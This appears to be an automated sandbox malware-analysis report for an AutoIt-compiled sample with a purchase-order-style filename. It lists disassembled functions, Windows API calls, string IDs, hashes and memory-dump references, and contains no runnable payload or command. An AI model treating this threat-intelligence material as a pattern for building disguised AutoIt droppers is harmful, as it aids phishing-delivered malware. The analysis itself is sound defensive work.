                                                                  • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                  Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                  • GetClientRect.USER32(?,?), ref: 00471D05
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                  • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                  • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                  • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                  • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                  • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                  • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                  • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                  • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                  • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                  • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                  • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                  • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                  • String ID: @$AutoIt v3 GUI
                                                                  • API String ID: 867697134-3359773793
                                                                  • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                  • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                  • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                  • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                  Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 1503153545-1459072770
                                                                  • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                  • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                  Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll$__wcsnicmp
                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                  • API String ID: 790654849-32604322
                                                                  • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                  • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                  • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                  • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                  Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                  • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                  • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                  • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                  Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                  • _fseek.LIBCMT ref: 00452B3B
                                                                  • __wsplitpath.LIBCMT ref: 00452B9B
                                                                  • _wcscpy.LIBCMT ref: 00452BB0
                                                                  • _wcscat.LIBCMT ref: 00452BC5
                                                                  • __wsplitpath.LIBCMT ref: 00452BEF
                                                                  • _wcscat.LIBCMT ref: 00452C07
                                                                  • _wcscat.LIBCMT ref: 00452C1C
                                                                  • __fread_nolock.LIBCMT ref: 00452C53
                                                                  • __fread_nolock.LIBCMT ref: 00452C64
                                                                  • __fread_nolock.LIBCMT ref: 00452C83
                                                                  • __fread_nolock.LIBCMT ref: 00452C94
                                                                  • __fread_nolock.LIBCMT ref: 00452CB5
                                                                  • __fread_nolock.LIBCMT ref: 00452CC6
                                                                  • __fread_nolock.LIBCMT ref: 00452CD7
                                                                  • __fread_nolock.LIBCMT ref: 00452CE8
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                  • __fread_nolock.LIBCMT ref: 00452D78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                  • String ID:
                                                                  • API String ID: 2054058615-0
                                                                  • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                  • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                  • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                  • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                  Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window
                                                                  • String ID: 0
                                                                  • API String ID: 2353593579-4108050209
                                                                  • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                  • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                  • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                  • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                  Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                  • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                  • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                  • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                  • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                  • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                  • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                  • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                  • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                  • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                  • GetSysColor.USER32(00000008), ref: 0044A265
                                                                  • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                  • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                  • String ID:
                                                                  • API String ID: 1744303182-0
                                                                  • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                  • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                  • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                  • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                  Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                  • __mtterm.LIBCMT ref: 00417C34
                                                                    • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                    • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                    • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                    • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                  • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                  • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                  • __init_pointers.LIBCMT ref: 00417CE6
                                                                  • __calloc_crt.LIBCMT ref: 00417D54
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                  • API String ID: 4163708885-3819984048
                                                                  • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                  • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                  • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                  • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                  Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                  • API String ID: 0-1896584978
                                                                  • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                  • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                  • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                  • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                  Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll$IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2485277191-404129466
                                                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                  Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                  • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                  • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                  • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                  • GetDesktopWindow.USER32 ref: 0045476F
                                                                  • GetWindowRect.USER32(00000000), ref: 00454776
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                  • GetClientRect.USER32(?,?), ref: 004547D2
                                                                  • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                  • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                  • String ID:
                                                                  • API String ID: 3869813825-0
                                                                  • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                  • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                  • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                  • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                  Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00464B28
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                  • _wcslen.LIBCMT ref: 00464C28
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                  • _wcslen.LIBCMT ref: 00464CBA
                                                                  • _wcslen.LIBCMT ref: 00464CD0
                                                                  • _wcslen.LIBCMT ref: 00464CEF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
